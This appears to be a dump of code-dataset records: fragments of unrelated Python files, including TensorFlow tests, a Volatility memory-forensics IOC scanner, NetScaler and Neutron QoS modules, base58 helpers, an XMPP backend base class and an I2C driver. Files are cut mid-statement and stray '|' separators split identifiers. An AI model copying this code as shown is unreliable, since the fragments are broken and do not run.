repr(field), repr(path.split("/")[-1])
),
)
for path, metadata in pkgs.items()
]
return params
return [
pytest.param(path, metadata, id=package_path(path))
for path, metadata in pkgs.items()
]
|
mdrumond/tensorflow | tensorflow/python/layers/core_test.py | Python | apache-2.0 | 19,327 | 0.008072 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tf.layers.core."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import numpy as np
from tensorflow.python.eager import context
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import test_util
from tensorflow.python.layers import core as core_layers
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import nn_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
class DenseTest(test.TestCase):
@test_util.run_in_graph_and_eager_modes()
def testDenseProperties(self):
dense = core_layers.Dense(2, activation=nn_ops.relu, name='my_dense')
self.assertEqual(dense.units, 2)
self.assertEqual(dense.activation, nn_ops.relu)
self.assertEqual(dense.kernel_regularizer, None)
self.assertEqual(dense.bias_regularizer, None)
self.assertEqual(dense.activity_regularizer, None)
self.assertEqual(dense.use_bias, True)
# Test auto-naming
dense = core_layers.Dense(2, activation=nn_ops.relu)
dense.apply(random_ops.random_uniform((5, 2)))
self.assertEqual(dense.name, 'dense_1')
dense = core_layers.Dense(2, activation=nn_ops.relu)
dense.apply(random_ops.random_uniform((5, 2)))
self.assertEqual(dense.name, 'dense_2')
@test_util.run_in_graph_and_eager_modes()
def testCall(self):
dense = core_layers.Dense(2, activation=nn_ops.relu, name='my_dense')
inputs = random_ops.random_uniform((5, 4), seed=1)
outputs = dense(inputs)
self.assertListEqual([5, 2], outputs.get_shape().as_list())
self.assertListEqual(dense.variables, [dense.kernel, dense.bias])
self.assertListEqual(dense.trainable_variables,
[dense.kernel, dense.bias])
self.assertListEqual(dense.non_trainable_variables, [])
if context.in_graph_mode():
self.assertEqual(
len(ops.get_collection(ops.GraphKeys.TRAINABLE_VARIABLES)), 2)
self.assertEqual(dense.kernel.name, 'my_dense/kernel:0')
self.assertEqual(dense.bias.name, 'my_dense/bias:0')
@test_util.run_in_graph_and_eager_modes()
def testCallTensorDot(self):
dense = core_layers.Dense(2, activation=nn_ops.relu, name='my_dense')
inputs = random_ops.random_uniform((5, 4, 3), seed=1)
outputs = dense(inputs)
self.assertListEqual([5, 4, 2], outputs.get_shape().as_list())
@test_util.run_in_graph_and_eager_modes()
def testNoBias(self):
dense = core_layers.Dense(2, use_bias=False, name='my_dense')
inputs = random_ops.random_uniform((5, 2), seed=1)
_ = dense(inputs)
self.assertListEqual(dense.variables, [dense.kernel])
self.assertListEqual(dense.trainable_variables, [dense.kernel])
self.assertListEqual(dense.non_trainable_variables, [])
if context.in_graph_mode():
self.assertEqual(
len(ops.get_collection(ops.GraphKeys.TRAINABLE_VARIABLES)), 1)
self.assertEqual(dense.kernel.name, 'my_dense/kernel:0')
self.assertEqual(dense.bias, None)
@test_util.run_in_graph_and_eager_modes()
def testNonTrainable(self):
dense = core_layers.Dense(2, trainable=False, name='my_dense')
inputs = random_ops.random_uniform((5, 2), seed=1)
_ = dense(inputs)
self.assertListEqual(dense.variables, [dense.kernel, dense.bias])
self.assertListEqual(dense.non_trainable_variables,
[dense.kernel, dense.bias])
self.assertListEqual(dense.trainable_variables, [])
if context.in_graph_mode():
self.assertEqual(
len(ops.get_collection(ops.GraphKeys.TRAINABLE_VARIABLES)), 0)
@test_util.run_in_graph_and_eager_modes()
def testOutputShape(self):
dense = core_layers.Dense(7, activation=nn_ops.relu, name='my_dense')
inputs = random_ops.random_uniform((5, 3), seed=1)
outputs = dense.apply(inputs)
self.assertEqual(outputs.get_shape().as_list(), [5, 7])
inputs = random_ops.random_uniform((5, 2, 3), seed=1)
outputs = dense(inputs)
self.assertEqual(outputs.get_shape().as_list(), [5, 2, 7])
inputs = random_ops.random_uniform((1, 2, 4, 3), seed=1)
outputs = dense.apply(inputs)
self.assertEqual(outputs.get_shape().as_list(), [1, 2, 4, 7])
def testCallOnPlaceHolder(self):
inputs = array_ops.placeholder(dtype=dtypes.float32)
dense = core_layers.Dense(4, name='my_dense')
with self.assertRaises(ValueError):
dense(inputs)
inputs = array_ops.placeholder(dtype=dtypes.float32, shape=[None, None])
de | nse = core_layers.Dense(4, name='my_dense')
with self.assertRaises(ValueError):
dense(inputs)
inputs = array_ops.placeholder(
dtype=dtypes.float32, shape=[None, None, None])
dense = core_layers.Dense(4, name='my_dense')
with self.assertRaises(ValueError):
dense(inputs)
inputs = array_ops.placeholder(dtype=dtypes.float32, shape=[None, 3])
| dense = core_layers.Dense(4, name='my_dense')
dense(inputs)
inputs = array_ops.placeholder(dtype=dtypes.float32, shape=[None, None, 3])
dense = core_layers.Dense(4, name='my_dense')
dense(inputs)
@test_util.run_in_graph_and_eager_modes()
def testActivation(self):
dense = core_layers.Dense(2, activation=nn_ops.relu, name='dense1')
inputs = random_ops.random_uniform((5, 3), seed=1)
outputs = dense(inputs)
if context.in_graph_mode():
self.assertEqual(outputs.op.name, 'dense1/Relu')
dense = core_layers.Dense(2, name='dense2')
inputs = random_ops.random_uniform((5, 3), seed=1)
outputs = dense(inputs)
if context.in_graph_mode():
self.assertEqual(outputs.op.name, 'dense2/BiasAdd')
def testActivityRegularizer(self):
regularizer = lambda x: math_ops.reduce_sum(x) * 1e-3
dense = core_layers.Dense(
2, name='my_dense', activity_regularizer=regularizer)
inputs = random_ops.random_uniform((5, 3), seed=1)
_ = dense(inputs)
loss_keys = ops.get_collection(ops.GraphKeys.REGULARIZATION_LOSSES)
self.assertEqual(len(loss_keys), 1)
self.assertListEqual(dense.losses, loss_keys)
def testKernelRegularizer(self):
regularizer = lambda x: math_ops.reduce_sum(x) * 1e-3
dense = core_layers.Dense(
2, name='my_dense', kernel_regularizer=regularizer)
inputs = random_ops.random_uniform((5, 3), seed=1)
_ = dense(inputs)
loss_keys = ops.get_collection(ops.GraphKeys.REGULARIZATION_LOSSES)
self.assertEqual(len(loss_keys), 1)
self.assertListEqual(dense.losses, loss_keys)
def testKernelRegularizerWithReuse(self):
regularizer = lambda x: math_ops.reduce_sum(x) * 1e-3
inputs = random_ops.random_uniform((5, 3), seed=1)
_ = core_layers.dense(
inputs, 2, name='my_dense', kernel_regularizer=regularizer)
self.assertEqual(
len(ops.get_collection(ops.GraphKeys.REGULARIZATION_LOSSES)), 1)
_ = core_layers.dense(
inputs, 2, name='my_dense', kernel_regularizer=regularizer, reuse=True)
self.assertEqual(
len(ops.get_collection(ops.GraphKeys.REGULARIZATION_LOSSES)), 1)
def testBiasRegularizer(self):
regularizer = lambda x: math_ops.reduce_sum(x) * 1e-3
dense = core_layers.Dense(2, name='my_dens |
elhoim/openioc_scan | openioc_scan.py | Python | gpl-2.0 | 105,288 | 0.006468 | # openioc_scan Volatility plugin
# based on ioc_writer (https://github.com/mandiant/ioc_writer) and pyioc (https://github.com/jeffbryner/pyioc)
# Copyright (c) 2014 Takahiro Haruyama (@cci_forensics)
# http://takahiroharuyama.github.io/
import volatility.utils as utils
import volatility.obj as obj
import volatility.debug as debug
import volatility.constants as constants
import volati | lity.commands as commands
import volatility.plugins.common as common
import volatility.plugins.netscan as netscan
import volatility.plugins.overlays.windows.tcpip_vtypes as tcpip_vtypes
import volatility.plugins.registry.hivelist as hivelist
import volatility.plugins.registry.shimcache as shimcache
import volatility.plugins.taskmods as taskmods
import volatility.plugins.modules as modules
import volatility.plugins.modscan as modscan
import vo | latility.plugins.filescan as filescan
import volatility.plugins.privileges as privileges
import volatility.plugins.ssdt as ssdt
import volatility.plugins.mftparser as mftparser
import volatility.plugins.malware.malfind as malfind
import volatility.plugins.malware.impscan as impscan
import volatility.plugins.malware.psxview as psxview
import volatility.plugins.malware.svcscan as svcscan
import volatility.plugins.malware.apihooks as apihooks
import volatility.plugins.malware.devicetree as devicetree
import volatility.plugins.malware.callbacks as callbacks
import volatility.plugins.malware.timers as timers
import volatility.win32 as win32
import volatility.win32.hive as hivemod
import volatility.win32.rawreg as rawreg
import volatility.win32.tasks as tasks
import glob, os, re, sqlite3, urllib, socket, time
from lxml import etree as et
from ioc_writer import ioc_api
import colorama
colorama.init()
g_version = '2015/02/24'
g_cache_path = ''
g_detail_on = False
g_color_term = colorama.Fore.MAGENTA
g_color_detail = colorama.Fore.CYAN
g_sus_path_p = re.compile(r'\\ProgramData|\\\$Recycle\.Bin|\\Windows\\Temp|\\Users\\All Users|\\Users\\Default|\\Users\\Public|\\Users\\.*\\AppData', re.IGNORECASE)
READ_BLOCKSIZE = 1024 * 1024 * 10
SCORE_THRESHOLD = 100
# copied from netscan
AF_INET = 2
AF_INET6 = 0x17
inaddr_any = utils.inet_ntop(socket.AF_INET, '\0' * 4)
inaddr6_any = utils.inet_ntop(socket.AF_INET6, '\0' * 16)
if constants.VERSION < 2.4:
# copied from malfind
class MalwareObjectClases(obj.ProfileModification):
before = ['WindowsObjectClasses']
conditions = {'os': lambda x: x == 'windows'}
def modification(self, profile):
profile.object_classes.update({
'_EPROCESS': malfind.MalwareEPROCESS,
})
# copied from apihooks
# hook modes
HOOK_MODE_USER = 1
HOOK_MODE_KERNEL = 2
# hook types
HOOKTYPE_IAT = 4
HOOKTYPE_EAT = 8
HOOKTYPE_INLINE = 16
HOOKTYPE_NT_SYSCALL = 32
HOOKTYPE_CODEPAGE_KERNEL = 64
HOOKTYPE_IDT = 128
HOOKTYPE_IRP = 256
HOOKTYPE_WINSOCK = 512
# names for hook types
hook_type_strings = apihooks.hook_type_strings
WINSOCK_TABLE = apihooks.WINSOCK_TABLE
# copied from devicetree
MAJOR_FUNCTIONS = devicetree.MAJOR_FUNCTIONS
# copied from privileges
PRIVILEGE_INFO = privileges.PRIVILEGE_INFO
class Timer(object):
def __init__(self, verbose=False):
self.verbose = verbose
def __enter__(self):
self.start = time.time()
return self
def __exit__(self, *args):
self.end = time.time()
self.secs = self.end - self.start
self.msecs = self.secs * 1000 # millisecs
if self.verbose:
print 'elapsed time: %f ms' % self.msecs
class ItemUtil:
def is_condition_bool(self, condition):
supported_conditions = ['is', 'contains']
if condition in supported_conditions:
return True
else:
return False
def is_condition_string(self, condition):
supported_conditions = ['is', 'contains', 'matches', 'starts-with', 'ends-with']
if condition in supported_conditions:
return True
else:
return False
def is_condition_integer(self, condition):
supported_conditions = ['is', 'greater-than', 'less-than']
if condition in supported_conditions:
return True
else:
return False
def make_regex(self, content, preserve_case):
if preserve_case == 'true':
pattern = re.compile(content, re.DOTALL)
else:
pattern = re.compile(content, re.DOTALL | re.IGNORECASE)
return pattern
def check_string(self, target, content, condition, preserve_case):
#out = colorama.Style.BRIGHT + g_color_detail + target + colorama.Fore.RESET + colorama.Style.RESET_ALL
out = g_color_detail + target + colorama.Fore.RESET
if condition == 'matches':
pattern = self.make_regex(content, preserve_case)
if pattern.search(target) is not None:
if g_detail_on:
print('matched IOC term detail: {0}'.format(out))
return True
else:
if preserve_case == 'false':
target = target.lower()
content = content.lower()
if condition == 'is':
if target == content:
if g_detail_on:
print('matched IOC term detail: {0}'.format(out))
return True
elif condition == 'contains':
if target.find(content) != -1:
if g_detail_on:
print('matched IOC term detail: {0}'.format(out))
return True
elif condition == 'starts-with':
if target.startswith(content):
if g_detail_on:
print('matched IOC term detail: {0}'.format(out))
return True
elif condition == 'ends-with':
if target.endswith(content):
if g_detail_on:
print('matched IOC term detail: {0}'.format(out))
return True
return False
def check_strings(self, target_list, content, condition, preserve_case):
result = False
for target in target_list:
if self.check_string(target, content, condition, preserve_case):
#return True
result = True
#return False
return result
def extract_unicode(self, data):
pat = re.compile(ur'(?:[\x20-\x7E][\x00]){4,}')
return list(set([w.decode('utf-16le') for w in pat.findall(data)]))
def extract_ascii(self, data):
pat = re.compile(r'(?:[\x20-\x7E]){4,}')
return list(set([w.decode('ascii') for w in pat.findall(data)]))
def check_integer(self, target, content, condition, preserve_case):
if condition == 'is':
if target == content:
return True
elif condition == 'greater-than':
if target > content:
return True
elif condition == 'less-than':
if target < content:
return True
return False
def check_integers(self, target_list, content, condition, preserve_case):
for target in target_list:
if self.check_integer(target, content, condition, preserve_case):
return True
return False
def fetchall_from_db(self, cur, table, column):
debug.debug("{0} already done. Results reused".format(table))
sql = "select {0} from {1}".format(column, table)
cur.execute(sql)
return [record[0] for record in cur.fetchall()]
def fetchone_from_db(self, cur, table, column):
debug.debug("{0} already done. Results reused".format(table))
sql = "select {0} from {1}".format(column, table)
cur.execute(sql)
return cur.fetchone()[0]
class ProcessItem(impscan.ImpScan, netscan.Netscan, malfind.Malfind, apihooks.ApiHooks):
def __init__(self, process, cur, _config):
self.process = process
self.cur = cur
self._config = _config
self.kernel_space = utils.load_as(self._config)
self.flat_space = utils.load_as(self._config, astype = |
benfinke/ns_python | nssrc/com/citrix/netscaler/nitro/resource/config/gslb/gslbsite_binding.py | Python | apache-2.0 | 3,701 | 0.032694 | #
# Copyright (c) 2008-2015 Citrix Systems, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License")
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_resource
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_response
from nssrc.com.citrix.netscaler.nitro.service.options import options
from nssrc.com.citrix.netscaler.nitro.exception.nitro_exception import nitro_exception
from nssrc.com.citrix.netscaler.nitro.util.nitro_util import nitro_util
class gslbsite_binding(base_resource):
""" Binding class showing the resources that can be bound to gslbsite_binding.
"""
def __init__(self) :
self._sitename = ""
self.gslbsite_gslbservice_binding = []
@property
def sitename(self) :
ur"""Name of the GSLB site. If you specify a site name, details of all the site's constituent services are also displayed.<br/>Minimum length = 1.
"""
try :
return self._sitename
except Exception as e:
raise e
@sitename.setter
def sitename(self, sitename) :
ur"""Name of the GSLB site. If you specify a site name, details of all the site's constituent services are also displayed.<br/>Minimum length = 1
"""
try :
self._sitename = sitename
except Exception as e:
raise e
@property
def gslbsite_gslbservice_bindings(self) :
ur"""gslbservice that can be bound to gslbsite.
"""
try :
return self._gslbsite_gslbservice_binding
except Exception as e:
raise e
def _get_nitro_response(self, service, response) :
ur""" converts nitro response into object and returns the object array in case of get request.
"""
try :
result = service.payload_formatter.string_to_resource(gslbsite_binding_response, response, self.__class__.__name__)
if(result.errorcode != 0) :
if (result.errorcode == 444) :
service.clear_session(self)
if result.severity :
if (result.severity == "ERROR") :
raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
else :
raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
return result.gslbsite_binding
except Exception as e :
raise e
def _get_object_name(self) :
ur""" Returns the value of object identifier argument
"""
try :
if self.sitename is not None :
return str(self.sitename) |
return None
except Exception as e :
raise e
@classmethod
def get(self, service, sitename) :
ur""" Use this API to fetch gslbsite_binding resource.
"""
try :
if type(sitename) is not list :
obj = gslbsite_binding()
obj.sitename = sitename
response = obj.get_resource(service)
else :
if sitename and len(sitename) > 0 :
obj = [gslbsite_binding() for _ in range(len(sitename))]
for i in range(len(site | name)) :
obj[i].sitename = sitename[i];
response[i] = obj[i].get_resource(service)
return response
except Exception as e:
raise e
class gslbsite_binding_response(base_response) :
def __init__(self, length=1) :
self.gslbsite_binding = []
self.errorcode = 0
self.message = ""
self.severity = ""
self.sessionid = ""
self.gslbsite_binding = [gslbsite_binding() for _ in range(length)]
|
vavavr00m/pymine | util/base58.py | Python | apache-2.0 | 1,596 | 0.017544 | #!/usr/bin/env python
##
## Copyright 2009 Adriana Lukas & Alec Muffett
##
## Licensed under the Apache License, Version 2.0 (the "License"); you
## may not use this file except in compliance with the License. You
## may obtain a copy of the License at
##
## http://www.apache.org/licenses/LICENSE-2.0
##
## Unless required by applicable law or agreed to in writing, software
## distr | ibuted under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
## | implied. See the License for the specific language governing
## permissions and limitations under the License.
##
"""docstring goes here""" # :-)
# spec: http://www.flickr.com/groups/api/discuss/72157616713786392/
__b58chars = '123456789abcdefghijkmnopqrstuvwxyzABCDEFGHJKLMNPQRSTUVWXYZ'
__b58base = len(__b58chars) # let's not bother hard-coding
def b58encode(value):
"""
encode integer 'value' as a base58 string; returns string
"""
encoded = ''
while value >= __b58base:
div, mod = divmod(value, __b58base)
encoded = __b58chars[mod] + encoded # add to left
value = div
encoded = __b58chars[value] + encoded # most significant remainder
return encoded
def b58decode(encoded):
"""
decodes base58 string 'encoded' to return integer
"""
value = 0
column_multiplier = 1;
for c in encoded[::-1]:
column = __b58chars.index(c)
value += column * column_multiplier
column_multiplier *= __b58base
return value
if __name__ == '__main__':
x = b58encode(12345678)
print x, '26gWw'
print b58decode(x), 12345678
|
mathiasertl/xmpp-backends | xmpp_backends/base.py | Python | gpl-3.0 | 21,732 | 0.002761 | # This file is part of xmpp-backends (https://github.com/mathiasertl/xmpp-backends).
#
# xmpp-backends is free software: you can redistribute it and/or modify it under the terms of the GNU General
# Public License as published by the Free Software Foundation, either version 3 of the License, or (at your
# option) any later version.
#
# xmpp-backends is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the
# implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License
# for more details.
#
# You should have received a copy of the GNU General Public License along with xmpp-backends. If not, see
# <http://www.gnu.org/licenses/>.
"""Common code for XMPP backends."""
import ipaddress
import logging
import random
import re
import string
import time
from datetime import datetime
from datetime import timedelta
from importlib import import_module
import pytz
from .constants import CONNECTION_HTTP_BINDING
from .constants import CONNECTION_UNKNOWN
from .constants import CONNECTION_XMPP
log = logging.getLogger(__name__)
class BackendError(Exception):
"""All backend exceptions should be a subclass of this exception."""
pass
class InvalidXmppBackendError(BackendError):
"""Raised when a module cannot be imported."""
pass
class BackendConnectionError(BackendError):
"""Raised when the backend is unavailable."""
pass
class NotSupportedError(BackendError):
"""Raised when a backend does not support a specific function.
This error may be thrown only with specific versions, e.g. if it requires minimum version.
"""
pass
class UserExists(BackendError):
"""Raised when a user already exists."""
pass
class UserNotFound(BackendError):
"""Raised when a user is not found."""
def __init__(self, node, domain, resource=None):
self.node = node
self.domain = domain
self.resource = resource
def __str__(self):
s = '%s@%s' % (self.node, self.domain)
if self.resource is not None:
s += '/%s' % self.resource
return s
class UserSession(object):
"""An object describing a user session.
:param backend: The XMPP backend used for retrieving this session.
:param username: The username of the user.
:type username: str
:param domain: The domain of the user.
:type domain: str
:param resource: The resource of the user.
:param priority: The priority of this connection.
:param ip_address: The IP address of this connection.
:param uptime: A timestamp of when this connection came online.
:param status: The status message for this connection (e.g. "I am available.").
:param connection_type: The type of connection.
:param encrypted: If this connection is encrypted. This may be ``None`` if the backend is not able
decide if the connection is encrypted (e.g. if it is a HTTP bind connection).
:param compressed: If this connection uses XMPP stream compression. This is always ``None`` for
connections where this is not applicable, e.g. Websocket connections.
"""
def __init__(self, backend, username, domain, resource, priority, ip_address, uptime, status, status_text,
connection_type, encrypted, compressed):
self._backend = backend
self.username = username
self.domain = domain
self.jid = '%s@%s' % (username, domain)
self.resource = resource
self.priority = priority
self.ip_address = ip_address
self.uptime = uptime
self.status = status
self.status_text = status_text
self.connection_type = connection_type
self.encrypted = encrypted
self.compressed = compressed
def __eq__(self, other):
return isinstance(other, UserSession) and self.jid == other.jid and self.resource == other.resource
def __hash__(self):
return hash((self.jid, self.resource))
def __str__(self):
return '%s@%s/%s' % (self.username, self.domain, self.resource)
def __repr__(self):
return '<UserSession: %s@%s/%s>' % (self.username, self.domain, self.resource)
class XmppBackendBase(object):
"""Base class for all XMPP backends."""
library = None
"""Import-party of any third-party library you need.
Set this attribute to an import path and you will be able to access the module as ``self.module``. This
way you don't have to do a module-level import, which would mean that everyone has to have that library
installed, even if they're not using your backend.
:param version_cache_timeout: How long the API version for this backend will be cached.
:type version_cache_timeout: int or timedelta
"""
_module = None
minimum_version = None
version_cache_timeout = None
version_cache_timestamp = None
version_cache_value = None
def __init__(self, version_cache_timeout=3600):
if isinstance(version_cache_timeout, int):
version_cache_timeout = timedelta(seconds=version_cache_timeout)
self.version_cache_timeout = version_cache_timeout
super(XmppBackendBase, self).__init__()
@property
def module(self):
"""The module specified by the ``library`` attribute."""
if self._module is None:
if self.library is None:
raise ValueError(
"Backend '%s' doesn't specify a library attribute" % self.__class__)
try:
if '.' in self.library:
mod_path, cls_name = self.library.rsplit('.', 1)
mod = import_module(mod_path)
self._module = getattr(mod, cls_name)
else:
self._module = import_module(self.library)
except (AttributeError, ImportError):
raise ValueError("Couldn't load %s backend library" % cls_name)
return self._module
def datetime_to_timestamp(self, dt):
"""Helper function to convert a datetime object to a timestamp.
If datetime instance ``dt`` is naive, it is assumed that it is in UTC.
In Python 3, this just calls ``datetime.timestamp()``, in Python 2, it substracts any timezone offset
and returns the difference since 1970-01-01 00:00:00.
Note that the function always returns an int, even in Python 3.
>>> XmppBackendBase().datetime_to_timestamp(datetime(2017, 9, 17, 19, 59))
1505678340
>>> XmppBackendBase().datetime_to_timestamp(datetime(1984, 11, 6, 13, 21))
468595260
:param dt: The datetime object to convert. If ``None``, returns the current time.
:type dt: datetime
:return: The seconds in UTC.
:rtype: int
"""
if dt is None:
return int(time.time())
if not dt.tzinfo:
dt = pytz.utc.localize(dt)
return int(dt.timestamp())
def get_random_password(self, length=32, chars=None):
"""Helper function that gets a random password.
:param length: The length of the random password.
:type length: int
:param chars: A string with characters to choose from. Defaults to all ASCII letters and digits.
:type chars: str
"""
if chars is None:
chars = string.ascii_letters + string.digits
return ''.join(random.choice(chars) for x in range(length))
@property
def api_version(self):
"""Cached version of :py:func:`~xmpp_backends.base.X | mppBackendBase.get_api_version`."""
now = datetime.utcnow()
if self.version_cache_timestamp and self.version_cache_timestamp + self.version_cache_timeout > now:
return self.version_cache_value # we have a cached value
self.version_cache_value = self.get_api_version()
if self.minimum_version and self.version_cache_value < self.minimum_v | ersion:
raise NotSupportedError('%s requires ejabberd >= %s' % (self.__class__.__name__,
|
Gurulhu/Reborn | features/chat/markov_creation_snippets.py | Python | mit | 895 | 0.086034 | f = open("taylor.txt")
lines = f.read().split("\n")
f.close()
words = []
for i in lines:
words.extend( i. | split(" ") )
words = pd.Dataframe( words )
words = words[0].unique()
db = {}
for word in words:
db.update( { word : { "_word" : word } } )
db.update( {"_begin" : {"_word" : "_begin" } } )
for i in lines:
line = i.split(" ")
try:
n = db["_begin"][line[0]]
except:
n = 0
db["_begin"].update( { line[0] : n + 1 } )
for j in range( 1, len( line ) - 1 ):
try:
n = db[line[j-1]][line[j]]
except:
n = 0
db[line[ | j-1]].update( { line[j] : n + 1 } )
l = len( line ) - 1
try:
n = db[ line( l ) ]["_end"]
except:
n = 0
db[ line[ l ]].update( {"_end" : n + 1} )
print( line, line[l] )
result = collection.insert_many( [db[i] for i in db.keys() ] )
|
south-coast-science/scs_dfe_eng | src/scs_dfe/gas/scd30/pca9543a.py | Python | mit | 1,642 | 0.003654 | """
Created on 19 Nov 2020
@author: Bruno Beloff (bruno.beloff@southcoastscience.com)
Two-Channel I2C-Bus Switch With Interrupt Logic and Reset
https://www.ti.com/product/PCA9543A
"""
from scs_host.bus.i2c import I2C
# --------------------------------------------------------------------------------------------------------------------
class PCA9543A(object):
"""
classdocs
"""
___I2C_ADDR = 0x70
# ----------------------------------------------------------------------------------------------------------------
def __init__(self):
"""
Constructor
"""
self.__addr = self.___I2C_ADDR
# -------------------- | --------------------------------------------------------------------------------------------
def enable | (self, ch0, ch1):
ch0_en = 0x01 if ch0 else 0x00
ch1_en = 0x02 if ch1 else 0x00
ctrl = ch1_en | ch0_en
try:
I2C.Sensors.start_tx(self.__addr)
I2C.Sensors.write(ctrl)
finally:
I2C.Sensors.end_tx()
def read(self):
try:
I2C.Sensors.start_tx(self.__addr)
ctrl = I2C.Sensors.read(1)
finally:
I2C.Sensors.end_tx()
return ctrl
def reset(self):
self.enable(False, False)
# ----------------------------------------------------------------------------------------------------------------
def __str__(self, *args, **kwargs):
try:
ctrl = "0x%02x" % self.read()
except OSError:
ctrl = None
return "PCA9543A:{addr:0x%02x, ctrl:%s}" % (self.__addr, ctrl)
|
E2i9/Virdi_Server | functions/set_vagas_apto.py | Python | agpl-3.0 | 1,071 | 0.004669 | import psycopg2.extensions
from operator import add
psycopg2.extensions.register_type(psycopg2.extensions.UNICODE)
psycopg2.extensions.register_type(psycopg2.extensions.UNICODEARRAY)
with psycopg2.connect(database="reserva", user="cezar") as conn_pg:
with conn_pg.cursor() as conn_pgs:
conn_pgs.execute("select name from occ_apto;")
aptos = reduce(add, conn_pgs.fetchall())
for apto in aptos:
with conn_pg.cursor() as conn_pgs2:
conn_pgs2.execute("select id from occ_vaga_moto where name = (%s);", (apto,))
_vaga = conn_pgs2.fetchone()
with conn_pg.cursor() as conn_pgs3:
conn_pgs3.execute("update occ_apto set vaga_moto_id = (%s) where name = (%s);", (_vaga, apto,))
with conn_pg.cursor() as conn_pgs4:
conn_pgs4.execute("select id from occ_vaga_carro where nam | e = (%s);", (apto,))
_vaga = conn_pgs4.fetchone()
with conn_pg.cursor() as conn_pgs5:
conn_pgs5.execute("update | occ_apto set vaga_carro_id = (%s) where name = (%s);", (_vaga, apto,))
|
jacknjzhou/neutron | neutron/services/qos/qos_plugin.py | Python | apache-2.0 | 7,356 | 0.000136 | # Copyright (c) 2015 Red Hat Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_log import log as logging
from neutron.common import exceptions as n_exc
from neutron.db import api as db_api
from neutron.db import db_base_plugin_common
from neutron.extensions import qos
from neutron.objects.qos import policy as policy_object
from neutron.objects.qos import rule as rule_object
from neutron.objects.qos import rule_type as rule_type_object
from ne | utron.services.qos.notification_drivers import manager as driver_mgr
LOG = logging.getLogger(__name__)
class QoSPlugin(qos.QoSPluginBase):
"""Implementation of the Neutron QoS Service Plugin.
This class implements a Quality of Service plugin that
provides quality of service parameters over ports and
networks.
"""
supported_extension_aliases = ['qos']
def __init__(self):
super(QoSPlugin, self | ).__init__()
self.notification_driver_manager = (
driver_mgr.QosServiceNotificationDriverManager())
@db_base_plugin_common.convert_result_to_dict
def create_policy(self, context, policy):
policy = policy_object.QosPolicy(context, **policy['policy'])
policy.create()
self.notification_driver_manager.create_policy(context, policy)
return policy
@db_base_plugin_common.convert_result_to_dict
def update_policy(self, context, policy_id, policy):
policy = policy_object.QosPolicy(context, **policy['policy'])
policy.id = policy_id
policy.update()
self.notification_driver_manager.update_policy(context, policy)
return policy
def delete_policy(self, context, policy_id):
policy = policy_object.QosPolicy(context)
policy.id = policy_id
self.notification_driver_manager.delete_policy(context, policy)
policy.delete()
def _get_policy_obj(self, context, policy_id):
obj = policy_object.QosPolicy.get_by_id(context, policy_id)
if obj is None:
raise n_exc.QosPolicyNotFound(policy_id=policy_id)
return obj
@db_base_plugin_common.filter_fields
@db_base_plugin_common.convert_result_to_dict
def get_policy(self, context, policy_id, fields=None):
return self._get_policy_obj(context, policy_id)
@db_base_plugin_common.filter_fields
@db_base_plugin_common.convert_result_to_dict
def get_policies(self, context, filters=None, fields=None,
sorts=None, limit=None, marker=None,
page_reverse=False):
return policy_object.QosPolicy.get_objects(context, **filters)
#TODO(QoS): Consider adding a proxy catch-all for rules, so
# we capture the API function call, and just pass
# the rule type as a parameter removing lots of
# future code duplication when we have more rules.
@db_base_plugin_common.convert_result_to_dict
def create_policy_bandwidth_limit_rule(self, context, policy_id,
bandwidth_limit_rule):
# make sure we will have a policy object to push resource update
with db_api.autonested_transaction(context.session):
# first, validate that we have access to the policy
policy = self._get_policy_obj(context, policy_id)
rule = rule_object.QosBandwidthLimitRule(
context, qos_policy_id=policy_id,
**bandwidth_limit_rule['bandwidth_limit_rule'])
rule.create()
policy.reload_rules()
self.notification_driver_manager.update_policy(context, policy)
return rule
@db_base_plugin_common.convert_result_to_dict
def update_policy_bandwidth_limit_rule(self, context, rule_id, policy_id,
bandwidth_limit_rule):
# make sure we will have a policy object to push resource update
with db_api.autonested_transaction(context.session):
# first, validate that we have access to the policy
policy = self._get_policy_obj(context, policy_id)
rule = rule_object.QosBandwidthLimitRule(
context, **bandwidth_limit_rule['bandwidth_limit_rule'])
rule.id = rule_id
rule.update()
policy.reload_rules()
self.notification_driver_manager.update_policy(context, policy)
return rule
def delete_policy_bandwidth_limit_rule(self, context, rule_id, policy_id):
# make sure we will have a policy object to push resource update
with db_api.autonested_transaction(context.session):
# first, validate that we have access to the policy
policy = self._get_policy_obj(context, policy_id)
